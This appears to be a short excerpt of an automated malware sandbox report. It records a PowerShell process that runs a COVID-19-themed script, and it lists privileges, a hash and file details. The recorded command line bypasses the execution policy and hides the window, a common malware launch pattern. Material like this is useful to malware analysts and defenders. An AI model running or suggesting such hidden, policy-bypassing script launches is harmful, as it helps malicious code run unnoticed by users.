        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):false
        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ex bypass -win hid -f C:\Users\user\Desktop\COVID-19.ps1
        Imagebase:0x13ff30000
        File size:473600 bytes
        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:.Net C# or VB.NET
        Reputation:high

        Disassembly

        Code Analysis

        Reset < >